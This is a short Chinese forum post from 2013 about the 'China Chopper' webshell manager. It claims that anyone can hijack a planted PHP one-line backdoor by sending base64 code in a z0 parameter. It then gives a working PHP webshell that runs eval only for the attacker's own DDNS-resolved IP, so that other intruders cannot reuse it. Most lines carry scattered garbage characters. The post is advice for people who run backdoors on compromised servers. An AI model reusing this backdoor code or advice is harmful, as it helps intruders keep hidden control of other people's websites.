今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
9 `# X- q f" }% O, q/ o8 K) V
% Q9 y% k/ Q+ a8 @1 i就算你设置了密码,使用了eval($_REQUEST['moyo']);0 u' ], W+ ]( ?+ h( C# Y' T6 [
& x8 G, J, U. f% o$ D* i但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
% a8 g7 M, p2 N; {0 X3 D$ }5 m# W! A' N& F' n% t) q3 f" Y
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));( y/ D! s- H B# h+ ~0 \8 n) B' l
7 y" t8 d) e. c
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了+ k7 ]& a l0 { Y% |. I0 g
/ I( s$ k" h6 i: P9 g9 k6 [( ~4 i2 t
不知道是设计缺陷还是故意留的后门
# q s, a1 {% J% N" ]* M3 e$ W+ o, R, |* b3 Q" K; C Z$ {" L
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
' J, [; ^# t" s, v% ^
/ p1 `( H6 q3 Y% _本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org% e0 J, ~, o* ] P
# I4 t! ^. o6 \& f# S然后一句话后门这样写+ I3 |7 Q$ m( ?8 h4 E0 p; O5 M y1 p
+ _# g0 ~ i+ g<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
! [+ L& s- C0 u" w; I6 g这样就可以让一句话后门只允许自己的电脑连接了9 o! Y H1 ?2 q! l: H! j0 {
, u% t' D/ p5 h" \5 R4 t, A) O |
发表于 2013-7-26 12:45:48
收藏
支持
反对